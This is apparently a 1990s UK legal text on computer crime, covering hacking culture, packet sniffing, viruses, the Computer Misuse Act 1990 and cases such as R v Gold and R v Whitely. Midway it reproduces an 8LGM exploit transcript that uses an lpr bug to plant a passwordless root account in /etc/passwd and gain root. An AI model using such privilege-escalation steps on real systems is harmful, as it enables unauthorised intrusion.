In many instances, the fact of a computer's involvement in some scheme of criminal conduct raises no novel legal issues. Where the computer is involved in some scheme of fraud, there is little doubt that some form of theft related offence will be committed at the time when the perpetrator acquires possession of the funds in question. There may be dispute when an offence is committed. Given the speed and potential scale of electronic fund transfers - on oft-quoted estimate has it that the United Kingdom's currency reserves could be transferred abroad in 15 minutes - this is a matter of considerable practical significance, not least in that there may be a jurisdictional issue where the proceeds of a fraud are realised outwith the United Kingdom[1].
The focus of the present work will be on those areas where the question whether conduct is criminal is open to doubt. As with data protection, concerns at the adequacy of existing legal provisions has led to the enactment of computer specific legislation, in this case in the form of the Computer Misuse Act 1990. Again, therefore, a major element of the work must involve consideration how effective this legislation is likely to prove as a response to the challenges facing the law.
The media depiction of a hacker tends to be that of a male teenager in a greasy T-shirt and torn jeans who spends 27 hours slumped over a terminal , eyes gazing fixedly at the green glow of the VDU monitor. Before his very eyes banks, military installations, universities, companies and financial institutions fall before his relentless onslaught. Nowhere is safe, no one can keep him out, no one knows of the scale of the threat, the silent deadly menace stalks the networks. A juvenile prodigy who programmed from the age of three, the hacker possesses boundless, unsurpassable knowledge of every operating system and is endowed with a remarkable natural talent for programming. Fluent in all languages, he can write special programs to overcome all obstacles and can cover his electronic traces to leave no sign of intrusion. The hacker has no friends, likes heavy metal music, has never had a girlfriend and gains all sense of self worth through pounding the keyboards and controlling the world's networks.
Possibly this is itself a stereotype of a media stereotype and is over simplistic but such imagery is widely scattered throughout much 'hacker' reporting. The UK hacker, Neil Woods, who was arrested and charged under the Computer Misuse Act in 1991, although admitting to having hacked into many computers, complained that the mere mention of the word 'hacking' appeared to generate a atmosphere of exaggerated fear and hysteria about what hackers were capable of doing
There were a lot of incredible stories in the press, such as we delayed the gulf war because we gained access to a met.office computer, and they thought we were a foreign power - the computer was supposedly supplying forecasts for the gulf area at the time ... don't believe most of what you read about us, a lot of it is factually incorrect, from our ages up to what we were alleged to have hacked. I don't blame journalists for some of it though, as there was a lot of garbage said in court.[3]
Genuine uncertainty about what a hacker is provokes much of this kind of reaction. Many people assume that hackers are necessarily possessed of strange and sinister talents which enable them to gain free access to the world's computers and that often their motives are malicious and their activities dangerous. In the Net News[4] group, Alt.Hackers, Jef Poskanzer regularly warns readers what the news group is really all about.
What's a hacker? This is kind of like asking a Zen Buddhist "What is Zen?", or asking Louis Armstrong "What is jazz?" ...There was a period in the '80s when the media used "hacker" to mean someone who breaks into computer systems. They were using the word incorrectly. Some people who came of age during that period believed the media's incorrect definition, applied it to themselves, and now think they are some sort of glorious outlaw hacker. These people are sadly misguided. Perhaps someday they will figure out what hacking is really about. Perhaps reading this news group will help ...
Hacking is a generic expression in the computing world and can be applied in many contexts. The New Hacker's Dictionary[5] defines hacking in various ways
Computer 'hacking' retains many of these principles and was a natural progression from 'phreaking' phones, as networked computers even today are simply computers hooked up via telecommunication lines whether by traditional analogue telephone lines, the latest ISDN lines or by satellite. The 'hacker' Net News group, alt.2600, which continues its existence on the Internet takes its name from the 2600 hertz that enabled phone phreaks to access the phone system.
Members of the Phrack editorial board were at one time associated with the 'Legion of Doom' , a hacker group which operated in the United States in the late 1980's. The group's wide ranging activities included diversion of telephone networks, copying proprietary information from companies and distributing 'hacking' tutorials. In 1990, two 'Legion of Doom' members were prosecuted under the American Wire Fraud and Computer Fraud and Abuse Statutes for their alleged misappropriation of confidential information relating to the operation of the emergency 911 telephone service. During the trial, the semantics of the term 'hacking' emerged as an issue. One 'Legion of Doom' member objected to being described in court as a 'hacker' as he felt such a term was 'unnecessary and prejudicial'[6]. The court however found that such a term was acceptable to describe persons who gain unauthorised access to computers. Reference was made to Webster's II New Riverside University Dictionary which defines a hacker as "Slang. One who gains unauthorised, usually non fraudulent access to another's computer system", with the term being taken generally to mean both those who gain unauthorised access and those who enjoy investigating computer operating systems.
In some cases, the 'hacker'/'cracker' may not be a programming genius or 'Whizz Kid' but may rather have characteristics in common with that other predominantly male pursuit[7]- trainspotting. This type of 'hacker'/'cracker' accumulates vast quantities of information, which in itself may be unimportant but which can be manipulated to form a whole, which if not larger than the sum of its parts, at least gives its possessor the knowledge necessary to begin 'tweaking' the system. All manner of detail concerning the minutiae of operating systems is collected with amateurish enthusiasm. Just as the train spotter through exhaustive tabulation of train times may work out an optimum route to avoid ticket collectors, such a hacker may work out a 'route' from unauthorised logger on to root access. Some hacks may be very simple. A recent discussion on the electronic 'hacker' Net News group, alt.2600 concerned the subject of hacking into the computerised legal retrieval service Lexis. For those hoping to reduce Lexis costs, the advice given was disappointing. The best strategy suggested was to stroll into a local university and 'shoulder surf' a password from an unsuspecting user. This tried and tested method remains a favourite for those pursuing the intentionally darker side of 'hacking'. Many other 'hacks' are still almost as quick and easy. During the Winter Olympics , the Net News carried many reports on how journalists had 'hacked' into Tonya Harding's e-mail account simply by using her date of birth. The links between credit card fraud and what is called 'hacking' are well known yet again the simplest methods are often the best. Before mail order companies tightened up security on mailing addresses, many such frauds were committed not by a generation of brilliant computer programmers overcoming the system security of credit card company databases, but by opportunists reading certain bulletin boards which posted account details of cards which had been stolen by more conventional means, thus making such information available to anyone with a computer and a modem. Obviously, any institution which relies on the digital transfer of credit, and which stores customer information on networked databases is at risk from the activities of 'hackers' but it is impossible to estimate to what extent skilled computer hackers are exploiting esoteric loopholes of operating systems in order to gain access to account information and to what extent the highways of Cyberspace are simply being used by criminals as a convenient means of communication. Some computer using criminals may only have a working knowledge of computing and networking, others may possess next to none. No one expects a car thief to necessarily know more about a car than how to drive it and possibly a few ingenious tricks on overcoming car security, again probably acquired from a 'friend' rather than worked out from first principles, but few would possess the skills necessary to design and build a car. Many 'hackers' seeking financial gain from Cyberspace may well fall into the 'users' category rather than the designers. However, the opportunities available to those whose skills are of a higher calibre remain extremely lucrative and as use of networks as vehicles for the transportation of an increasing variety of goods and services increases, the stakes can only get higher.
Experience the birth of the Computer Underground again from your own computer with this collection of original posts from bulletin boards like
*BBS*
*OSUNY*
*PLOVERNET*
*THE LEGION OF DOOM*
*BLACK ICE PRIVATE*
*THE PHOENIX PROJECT*
And many more ...
This ad appeared in an edition of Phrack in March 1993.
Does this suggest that the golden age of 'hacking' has passed already ? What can we expect to see take its place. From 'phone phreaking' to 'hacking', what next ?
It might be thought that the worst examples of insecure systems belong to the past, to an age when the mere use of a password was expected to provide adequate security and that advances in technology and in security awareness have increased the readiness of system managers to respond to 'hacker' challenges. However, reports of threats to financial and military security are as frequent as ever with even sites which one might have expected to have adopted the best in security measures continuing to experience difficulties.
For seven months the Pentagon has been unable to locate hackers tapping into its unclassified computer system, officials said Thursday. Defense Department officials have known since December that intruders in the United States and abroad have gained access to Pentagon computer files through the Internet and, in some cases, stolen, altered and erased records. But despite a security budget in the "hundreds of millions of dollars," the Pentagon has been unable to close the breach.[8]
Is such activity evidence that Phrack style 'hacking' is still alive and well or is a 90's style of 'hacking' beginning to emerge? Are young 'hackers' who perhaps following the distorted image of the 'media hacker', reaping where others have sown? Are latter day 'hackers' perhaps tempted by the fruits of 'hacking' rather than by the intellectual challenge? Computer networks now offer an increasing number of goods and services and as computer users turn into consumers, it is probable that rather than breaking into operating systems to explore the intricacies of system privileges, the 'hackers' of the future will be motivated by the desire to acquire the traffic on the 'Information Super Highway'. As computers themselves become high level consumer goods rather than low level technical 'gizmos', there will be more incentive to abuse the 'network' that operates in what is sometimes referred to as 'Cyberspace' rather than to target individual computers.
The Internet is a complex web of interconnected sites whose communications is made possible by adherence to a shared protocol. Use of the Internet has multiplied exponentially with a current membership of approximately 20 million people, 2.5 million computers and 30,000 networks. In the good old days, use of the Internet was limited to academic and research institutions whose concerns on system security were minimal; after all the primary purpose of such a network was the open exchange of information. Data was sent from site to site, often via numerous intermediary sites, in small chunks known as packets. The packets were then re assembled at the destination site in order to rebuild the complete message. As the focus shifts from individual sites to the network itself, such packets are extremely interesting and valuable to those seeking more than their fair share of network time and resources.
The number of Internet sites compromised by the ongoing series of network monitoring (sniffing) attacks continues to increase. The number of accounts compromised world-wide is now estimated to exceed 100,000. This series of attacks represents the most serious Internet threat in its history.[9]
Internet break-ins have been a national news story lately, with reports that unknown intruders have purloined more than 10,000 passwords in a burst of activity during recent months. The Federal Bureau of Investigation is investigating, since so many "federal-interest computers" are attached to the wide-open Internet and since it is a crime to possess and use other peoples' passwords[10]
Packet Sniffing is the latest piece of jargon to emerge in Cyberspace, 'hackers' are now attacking networks themselves rather than targeting specific sites. 'Packet Sniffer' programs are installed which monitor traffic at public access Internet sites. User names and passwords can be winnowed out of the electronic chaff to yield valuable access rights. Such techniques can subvert all conventional attempts to secure passwords as even encrypted passwords may simply be 'replayed' to the intended host site, only 'use once and dispose' passwords within firewalls[11] can remain safe from the packet sniffers. Such activities may be carried out by system administers attempting to assess site security again blurring the distinction between 'hacking' or 'cracking' and legitimate system management. 'Magic Cookies', another addition to the hackers lexicography are locations or addresses on the Internet, many 'Magic Cookies' are public domain in any case, as on a gopher server[12] whose purpose is to provide a browsing facility for public domain information at that site. However some gopher servers may be open to abuse in that their actual domain may extent far beyond the menu, allowing illicit 'Magic Cookies' to be passed to it requesting information not intended for public access.[13]
The telecommunications network is still a target of contemporary hackers and indeed is estimated to be one of the fastest growing forms of network abuse although as always precise figures are difficult to gauge with estimates ranging from millions to billions of pounds each year. The incentives are lucrative, long distance calls are sold on to third parties generating substantial revenues for the latter day phone phreakers. Methods vary from simple 'finger hacking', that is dialling at random until gold or an access code is struck to manipulation of programmable chips on cellular phones. The 'phreaking' community is now no longer confined to the use of 'blue boxes'; devices which generated the necessary 2600 hertz. Phone system hackers can now choose from a variety of colour box devices - Aqua, Beige, Black, Blotto, Brown, Bud, Busy, Chartreuse, Cheese, Clear, Crimson, Gold, Jack, Neon, Paisley, Pandora's, Pearl, Red, Scarlet, Silver, Tron and Yellow. All these boxes carry out a specific hacking tasks, for example a pearl box is defined as
a box that may substitute for many boxes which produce tones in hertz. The Pearl Box when operated correctly can produce tones from 1-9999hz. As you can see, 2600, 1633, 1336 and other crucial tones are obviously in its sound spectrum[14]
The Internet Underground, the latest addition to the World Wide Web collection of hacking information begins with the following words
Disclaimer: This page is provided for informational sake only. Don't do anything illegal. I don't.
Others may wonder why such information is posted to the Internet at all. Who is using such information and why ? Are they all conscientious system administrators honing their anti hacking techniques or are they aspiring hackers looking for a nursery school environment to begin learning the tricks of the trade ? The answer may lie in exploring what is sometimes referred to as the 'hacker ethic'[19]
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
/tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
/tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
/tmp/group: unmodified: line 49
> :/wheel
wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
/tmp/group: 49 lines, 944 characters.
Install our new files:
> % ./lprcp /tmp/group /etc/group
lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
lpr: cannot rename /var/spool/lpd/cfA061testnode
Check it worked:
> % ls -l /etc/passwd /etc/group
-rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
-rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
> % head -1 /etc/group
wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
Become root and tidy up:
> % su 8lgmroot
# chown root /etc/passwd /etc/group
# rm -f /tmp/passwd /tmp/group
#
NB This is only a very small excerpt from the necessary code and is an old hack which will not work on 'fixed' UNIX Operating Systems !
These are examples of a typical 'hacks' - lines of code which if run on a certain version of UNIX will result in the 'hacker' gaining root privileges i.e. total control of the system. Hacking of this kind is analogous to chess playing, it requires the ability to think several steps ahead and to mentally view the system or game not as a linear one dimensional structure but as a multi dimensional system with infinite interrelationships. The system administrator's game is to run a secure system ,however with oceans of code, all of which may be open to interesting new uses, it is a challenging task both to keep shipping lanes open for legitimate traffic and to keep out marauders. The strategy of the operating system hacker' is to tweak out unforeseen dependencies and to exploit them.
8LGM although no longer a 'hacker' group in the destructive sense of the word, have a chequered past. Two of their current members are Karl Strickland and Neil Woods who along with the more famous, 'addicted to hacking' Paul Bedworth, were charged under the Computer Misuse Act in 1991. Many reformed hackers do go on work as system managers so it is not a particularly surprising career development but could their activities still be a potential source of danger even if they themselves do not intend any destructive hacking?
Hackers may well not intend to cause harm to the computing system, most indeed, have great respect for the code of the operating system but by not only discovering security loopholes but publishing them indiscriminately, they may be aiding the less well intentioned. Such hackers are perhaps motivated by belief in their superior programming ability, a belief that they alone hold the key to system security, that the computer world needs them. The reality may very different, despite reports suggesting that Robert Morris was a brilliant if misguided programmer, it appears from later analyses[20] that the worm code he produced was sloppy and although involving some clever tricks, was hardly evidence of either original and ingenious code or superior programming intellect.
What motivates such 'hackers'? Why do they seek to discover holes in security systems when not specifically employed to do so and why do they make the information freely available to the world community via the Internet rather than simply alert system managers? It could also argued that many system managers particularly those running small systems cannot afford to spend time and money implementing an endless series of patches and fixes. House owners would not welcome burglars whose activities required them to change their locks every two or three weeks because their flaws had been widely publicised.
Why do so many hackers believe that their activities are of benefit to system managers ? Are their investigations into operating system security motivated by the desire to help or are they publicity seekers anxious to advertise their skills? Even if the latter is the case, does this necessarily imply that such people are dangerous? This may depend on how effective the 'hacking' advice is and to whom it is distributed. A person with legitimate concerns on airport security might, for a publicity stunt, smuggle an unattended package into a departure hall or attempt to check through unaccompanied package. Sympathy for such a safety campaigner might be reduced if he or she decided to publicise the security loophole on a Internet News group before alerting the airport managers.
Many such 'hackers' may be at worst attention seeking self important nuisances but by publicising their findings in such an free environment as the Internet, the danger is that others will follow, not merely to learn programming tricks in order to enhance their knowledge but to put their knowledge to more practical uses. As the Internet becomes more commercial, its wares may attract more buyers but it may well attract more electronic shoplifters.
Usage of physical terminology to describe aspects of computer technology is becoming commonplace. Much has been written concerning the concept of virtual reality. This immerses the user in a computer generated world where every "action" taken by the user produces an appropriate feedback affecting all the senses. Virtual reality techniques are currently used by architects to enable users to inspect a building before a brick has been laid. Scientists use virtual reality techniques to "see" how molecular structures are composed and the effect of any changes. For the future, virtual reality techniques are set to move into the entertainment field, the more lurid reports expound upon the possibilities of virtual sex. The promise - or threat - is that we can spend portions of our lives in 'virtual' worlds which will be indistinguishable from the real one save in the removal of any element of physical danger and in the ability of the user to exert a greater degree of control over the outcome of any exploits.
Whilst the use of physical descriptions may represent accurately the sentiments of those involved in the creation and use of computer based technologies, it is much more doubtful how far the criminal law can or should regard simulation as indistinguishable from reality. Although a computer hacker's reach may extend across the world, the hacker never leaves the confines of his or her own keyboard. No matter how exotic an experience in virtual reality might be, the subject never leaves a particular physical location.
Although the computer world may exist only in intangible form, it affects and in some cases controls our physical environment and lives to a very significant extent. The airplane which takes us on holiday will have many of its functions controlled by computer. Conduct which adversely affects the operation of the computer will put the safety of the passengers in very real danger. The financial world is heavily dependent on computers. In our interdependent society it has been estimated that a prolonged failure of the computer system of a major bank in California would effect the economy of the state within 3 days, the United States within a week and the world within 28 days. Fortunately, the matter has not been put to the test.
The term computer viruses has entered into popular demonology. The essence of a computer virus is that, like its human equivalent, it may be transmitted from one computer to another. This may occur when an infected disk is transferred between computers. In the event that computers are linked together either in a network or using a telecommunications connection, the virus may also be transmitted electronically. Having infected a computer, the effects of viruses may vary widely. Some viruses are relatively benign. An example is the `ping-pong' virus whose effects are limited to causing the image of a bouncing ball to move continually across the computer screen. others such as the `Friday 13th' and `Michaelangelo' viruses[21] can result in the permanent loss of data stored on the victim computer.
In one of the most notorious instances reported from the United States, a student at Cornell University wrote a computer program referred to as a worm. A worm is a program which replicates itself. Although initially, it may produce few adverse effects, the continuing doubling in size begins to consume larger and larger amounts of the computer system's memory. Ultimately, it will consume the storage space available and, by overwriting material which is already there, will cause the loss of that data. In the case in question, the worm was let loose on the Internet. Within a matter of hours, 6,000 computers were affected across the United States. Almost as worryingly, the student, who ultimately was convicted under the United States Computer Fraud and Abuse Act 1986, did not set out with the intention of causing damage. The incident can best be described as a practical joke which went wrong. A deliberate attempt to maximise the damage could have produced far more serious effects.
One aspect of the reports of the incident reveal a problem which besets efforts to assess the severity of computer related crime. One commentator assessed the cost of the "damage" at $186 million. Other, no less plausible, estimates reduce the cost to a few thousand dollars. It would appear that in some instances, the involvement of the computer in any scheme prompts the addition of several zero's to any assessment of the damage caused. In another case in the United States, a number of computer hackers were charged with theft of data from a telephone company. It was alleged that the value of the data was a very precise $79,499. This was based upon a calculation of all the costs incurred in compiling the data in question. The defence, however, was able to produce in evidence a technical document sold by the telephone company. This contained an even more extensive version of the data allegedly taken from the computer and retailed for $13. In the particular case, the prosecution collapsed at this point but the incident does indicate some of the difficulty which will be encountered whenever the attempt is made to put a value upon intangibles. The problem may not be as significant in Scotland where the offence itself is not dependent upon the value of the property involved.
The incidents recounted above serve as the basis for the first elements of this section. Initial consideration will be given to the extent to which those responsible for the destruction or amendment of data, whether by means of a computer virus or through other techniques, may face criminal sanctions. Next, consideration will be given to the legal response to the actions of computer hackers. In many instances, of course, the two topics will be linked and one of the features of the Law Commission's report[22] prior to the enactment of the Computer Misuse Act was its assertion that fear as to the possible harm resulting from an incident of computer hacking justified the imposition of criminal sanctions even though no actual harm had resulted.
A more recent authority, Denco v Joinson ( [1992] 1 All ER 463), illustrates that misuse of computing facilities will generally constitute gross industrial misconduct justifying summary dismissal of the employee responsible. In many cases this may be considered the most appropriate response to instances of this kind, a view supported by surveys of computer misuse conducted by the Audit Commission for England and Wales. Even in cases of fraud involving computer systems, prosecutions resulted in only 42% of cases[23]. In Cox v. Riley, however, criminal charges were brought alleging breach of section one of the Criminal Damage Act 1971. This states:
A person who without lawful excuse destroys or damages any property belonging to another intending to destroy or damage any such property .. shall be guilty of an offence.(Section 1)
The word "property" is defined as "property of a tangible nature whether real or personal." (Section 10)
The appellant, having been convicted before the Magistrates, appealed on the point whether damage to property had occurred. No damage had been caused to any piece of physical property. Although the contents of the printed circuit card had been erased, it remained a viable storage device. Upholding the conviction, the Divisional Court held that the requirement of damage to property had been satisfied in that the owner of the saw, which was unquestionably property for the purpose of the statute, had been required to expend time and effort of a more than minimal amount in order to restore it to its original condition, i.e. a saw capable of cutting in accordance with the instructions contained in a computer program.
Basing the offence upon the effort required to return property to its original condition does not appear conceptually inconsistent with other forms of conduct. In the event that a person sprays paint on a wall, there is no doubt that the offence will have been committed. The wall, however, will not have been destroyed or weakened in any way and remains fit for its purpose. The only cost incurred will be that which has to be met by the owner in returning it to its original condition as a structure free from unwanted artistic works.
In the Scottish case of HMA v. Wilson (1984 SLT 117) a similar approach was adopted in respect of the equivalent offence of malicious mischief. The case concerned a nuclear power station rather than a computer it being alleged that the respondent had maliciously pushed an emergency stop button thereby causing cessation of electricity generation and a loss to his employers estimated at [[sterling]]147,000. The emergency stop button reset itself automatically and the effect of its operation was to stop the generating machinery in a normal and non-damaging fashion. The only loss suffered was economic in nature. Reversing the finding of the Sheriff that the charge was irrelevant the High Court ruled (Lord Stewart dissenting) that conduct depriving the owner of property of the opportunity to use it "productively and profitably" sufficed to found a charge of malicious mischief.
The application of the offence of criminal damage to computer related conduct was again at issue in the case of R v. Whitely ((1991) 93 Cr App Rep 25). This case is of considerable interest in that it was concerned with what might be regarded as classic attributes of computer hacking. Reference has previously been made to computer networks. The computing facilities at most United Kingdom institutes of higher education are linked in a network referred to under the acronym JANET (Joint Academic NETwork). The communications facilities associated with this network allowed a user connected at one site to obtain access to any other JANET site. Access to the network was controlled by passwords. Although Whitley had no entitlement to access the system the culture within academic computing facilities in the 1980's was such that security was not afforded high priority. The initial act of obtaining access to a computer system would not have been very difficult and the appellant was able to secure this using a very cheap and basic personal computer and modem set up in his home.
It is clear from the account given above that Whitley's conduct had caused considerable inconvenience and not a little expense to the operators of the computer facilities affected and to other, authorised, users of the systems. Two charges were brought under the provisions of the Criminal Damage Act, the first alleging damage to the computer by virtue of their operations being stopped for periods of time, the second alleging damage to the discs (sic) which held the programs and data used in the computers. These discs are constructed to contain millions of magnetic particles which provide a medium for the recording of information in much the same way as a piece of paper can be written on. The effect of "writing" data to a disk is to produce particular combinations of magnetic polarity. These correspond to the binary symbols which form the basis of all digital computer operations. Whitley's activities, it was argued, altered the make-up of magnetic particles causing impairment to the operation of the computer systems and thereby committing the offence of criminal damage.
The charge of criminal damage to the computers was dismissed by the jury, a verdict with which the Court of Appeal indicated their approval. A conviction on the second count for which Whitley was sentenced to a term of 12 months imprisonment was the subject of the appeal, it being argued that the Criminal Damage Act required that damage be tangible. This contention was rejected by the Court of Appeal, the Lord Chief Justice (Lane) stating:
It seems to us that that contention contains a basic fallacy. What the Act requires to be proved is that tangible property has been damaged, not necessarily that the damage itself should be tangible. There can be no doubt that the magnetic particles upon the metal discs were a part of the discs and if the appellant was proved to have intentionally and without lawful excuse altered the particles in such a way as to cause an impairment of the value or usefulness of the disc to the owner, there would be damage within the meaning of section 1. The fact that the alteration could only be perceived by operating the computer did not make the alterations any the less real, or the damage, if the alteration amounted to damage, any less within the ambit of the Act.
... If the hacker's actions do not go beyond, for example, mere tinkering with an otherwise "empty" disc, no damage would be established. Where, on the other hand, the interference with the disc amounts to an impairment of the value or usefulness of the disc to the owner, then the necessary damage is established.
The decision in Whitely represents authoritative endorsement of the view that an act causing amendment to data held on a computer storage device can constitute the offence of criminal damage. However, by the time the decision was handed down, the Computer Misuse Act 1990 was in force. Acting on the expressed opinion of the Law Commission that:
... the practical meaning of damage has caused practical as well as theoretical problems ... evidenced by the experience of the police and prosecuting authorities who have informed us that, although convictions have been obtained in serious cases of unauthorised access to data or programs, there is recurrent (and understandable) difficulty in explaining to judges, magistrates and juries how the facts fit in with the present law of criminal damage. (Computer Misuse, 1989)
the Computer Misuse Act amended the Criminal Damage Act, providing in section 3(6) that:
For the purposes of the Criminal Damage Act 1971 a modification of the contents of a computer shall not be regarded as damaging any computer or computer storage medium unless its effect on the computer or computer storage medium impairs its physical condition.
The provisions of the Computer Misuse Act will be discussed in more detail below. Two comments may be made at this stage concerning the approach adopted. First, nowhere does the 1990 Act make any amendment to Scots criminal law. There would appear no reason why a charge of malicious mischief or vandalism could not continue to be brought in respect of computer related conduct. A second point to note is that the amendment to the Criminal Damage Act applies in respect of "the contents of a computer". Although this definition includes any disks or other forms of storage medium which are permanently or temporarily incorporated in a computer, the Act does not apply to a storage device per se. In the event that an unauthorised person placed a magnet in close proximity to a disk thereby causing the loss of any data held on it, no offence would be committed under the Computer Misuse Act as the disk could not be regarded as forming a part of a computer at the relevant time. Any prosecution would have to have recourse to the maligned Criminal Damage Act (as indeed would any prosecution based on the allegation that the contents of an audio or video tape had been erased). Such a dichotomy appears likely to perpetuate the educative problems referred to by the Law Commission. It cannot be considered satisfactory that conduct which produced exactly the same effect should face different criminal sanctions depending upon the accident whether a disk is in or out of a computer at the relevant time. Especially given the clear pronouncements of the Court of Appeal in Whitely, it may have been preferable to restrict any amendment to the definition of property in the Criminal Damage Act, making it clear that damage to the contents of any storage device would constitute damage to the device itself.
Undoubtedly the best known case involving the legal response to computer hacking is that of R v. Gold ([1988] AC 1063). Gold, together with his co-accused Schifreen, was a computer hacker. The victim in the case at issue was British Telecom who operated a computer service Prestel. The system consisted of a central computer system which provided a considerable variety of computer related services to its subscribers including electronic mail. Subscribers would be issued with a password and a user identification code. This would allow the system to monitor the extent of their usage and charge them accordingly. Special passwords were issued to British Telecom employees who required to access the system for the purposes of their employment. The attraction of these passwords for a would be hacker was that they did not cause any bills to be generated. Gold discovered such a password and made extensive use of it before the fact of his conduct was discovered.
If the case had originated in Scotland, there is little doubt that a charge of obtaining services by means of a false pretence would have been competent. Such a charge looks at the actions and intentions of the party seeking the service. In this case there seems no doubt that the hackers were seeking to masquerade as authorised users for the purpose of obtaining free access to the services. In England, the Theft Act of 1968 had replaced the concept of false pretence with that of obtaining services by deception. This change followed the recommendations of the Criminal Law Revision Committee whose eighth report sought to place greater emphasis upon the effect which conduct had upon its victim. The difficulty with this approach in the computer context is the question whether a machine can be deceived. Although there is no clear dicta on the point, the prevailing opinion appeared to be that the answer lay in the negative. Faced with uncertainty on this critical point, the decision was made to bring charges under the Forgery and Counterfeiting Act of 1981. This Act contained a number of provisions which appeared to make it appropriate for the facts of the case. It provides that an offence is committed by a party who presents a false instrument with the intention that it should be taken as genuine. It is further provided that attempts to deceive a machine should be equated with those affecting a human.
Gold and Schifreen were convicted at trial only for these convictions to be overturned by the unanimous judgments of the Court of Appeal and the House of Lords. The major objection identified by the appellate courts to the application of the Act lay in the difficulty of identifying any instrument which was used. The term "instrument" was defined in the Act as including any "disc, tape, sound track or other device in or one which information was recorded or stored". This, it was held, restricted its application to the situation where there was some physical storage device. In the present case this could only occur where the password details transmitted by the appellants were recorded on the Prestel system. Two objections were taken to such a result. First, largely because of the special nature of the passwords used, no details were maintained beyond the brief period, less than one second, taken for the authenticity of the password to be verified by the system. This, it was held, was too short a period to constitute a recording as required in the Act. The second objection was to the necessary identification of the Prestel computer as both the source of the deception and its victim. A somewhat schizophrenic state of affairs. Most damming perhaps, both tribunals were critical of the attempt to invoke the Forgery and Counterfeiting Act, the Lord Chief Justice commenting:
We have accordingly come to the conclusion that the language of the Act was not intended to apply to the situation which was shown to exist in this case. It is a conclusion which we reach without regret. The Procrustean attempt to force these facts into the language of an Act not designed to fit them produced great difficulties for both judge and jury which we would not wish to see repeated ... The appellants' conduct amounted in essence .. to dishonestly obtaining access to the relevant Prestel data bank by a trick. That is not a criminal offence. If it is thought desirable to do so, that is a matter for the legislature rather than the courts. We express no view on the matter.
The failure of the prosecution in this case was widely regarded as leaving the owners of the burgeoning ranks of commercial data bases exposed to the predatory activities of hackers and served to fuel the existing calls for legislative reform. It is likely that similar conduct might now be prosecuted under the provisions of section one of the Computer Misuse Act 1990.
Compilations of information are often of such importance to the business community that they are securely kept to ensure their confidentiality. The collated. confidential information may be found in many forms covering a wide variety of topics ... For many businessmen their confidential lists may well be the most valuable asset of their company.
A domestic illustration of this phenomenon can be seen in the case of Grant v. Allan (1987 SCCR 402) where the respondent removed a quantity of computer printouts from his employer's premises. The business in question was a parcel and document delivery service and the information on the printouts related to its customers and its pricing policy. The value of such information to a competitor is self-evident. The fact of the accused's conduct came to light when he approached one competitor with the offer to sell the information for [[sterling]]400, this approach subsequently being reported to the police and the accused arrested when he attempted to complete the transaction.
The major difficulty facing any prosecution in such a situation is the perennial issue whether information might be regarded as property sufficient to found a charge of theft. In the English case of Oxford v. Moss ((1978) 68 Cr. App. R. 183) a university student discovered a proof copy of an examination paper which he was due to attempt. He removed the paper with the intention of copying it. Realising that if the paper's absence were discovered a different paper might be set, it was an integral part of his scheme that the copy would be returned. The student was caught in the act of returning the paper. Under the Theft Act 1968, an essential element of the offence was the intention that the owner be deprived permanently of the property involved. This, of course, was not the case and so the student could not be charged with theft of the paper. In the event, a charge was brought alleging theft of the confidential information contained in the paper. It may well be argued, of course, that the "owner" was not deprived of the confidential information although the fact of the student's conduct might be taken as destroying the element of confidentiality. In the event, however, the charge was dismissed by the Magistrates whose finding that confidential information could not be regarded as property under the Theft Act was upheld by the Divisional Court.
Although a different approach has been adopted in a number of cases emanating from the United States where information has been accepted as constituting the subject of theft, these have been derived from a definition of theft significantly different from that applied in England and Scotland[24]. In Canada, although the majority of the Court of Appeals held in the case of R v. Stewart that confidential information could be regarded as property, this view was rejected by a unanimous Supreme Court.
As Oxford v. Moss illustrates, problems involving the property status of information did not await the computer. Espionage is generally regarded as one of the older professions. Although Oxford v. Moss illustrates that this is not always the case, such conduct often involves the perpetrator in the commission of offences involving unauthorised access to property -burglary, obtaining entry to a lockfast place etc. In the situation where information is held on a computer and where access may be obtained by means of a telecommunications link, there is no need for a computer spy to set foot on the premises. In the situation where personal data is involved, salt may even be rubbed into the victim's wounds when they discover that they have committed a breach of the eighth data protection principle requiring the maintenance of adequate security and face the wrath of the Data Protection Registrar. With only limited exaggeration, the consequence may be analogised to prosecuting a house owner whose property has been burgled for failing to secure windows or doors whilst exculpating the burglar.
In the situation where an unauthorised party has secured access to data held on a computer system with the view to obtaining some advantage from this conduct, there has been a widespread recognition that the conduct should attract criminal sanctions as a form of electronic burglary. Both the Council of Europe which produced a report concerning the need for and basic form of computer crime legislation and the Scottish Law Commission made recommendations to this effect, the latter recommending the enactment of a Computer Crime (Scotland) Act. This would create one new offence committed by a person who:
... not having authority to access to a program or data stored in a computer ... obtains such unauthorised access in order to inspect or otherwise to acquire knowledge of the program or the data or to add to, erase or otherwise alter the program or the data with the intention:
(a) of procuring an advantage for himself or another person; or
(b) of damaging another person's interests.
Few might dispute the desirability of prosecuting the theft of data from a computer system on the same basis as existing property related offences. More controversial is the question whether the unadorned act of obtaining access to data held on a computer should be criminalised. The challenge of hacking for many actors, it is suggested, lies in the act of obtaining access to computer systems. Effectively, the goal is to see how far the hacker can travel from their own keyboard. The nature of the information held on any systems visited is of little interest, the journey being the end in itself.
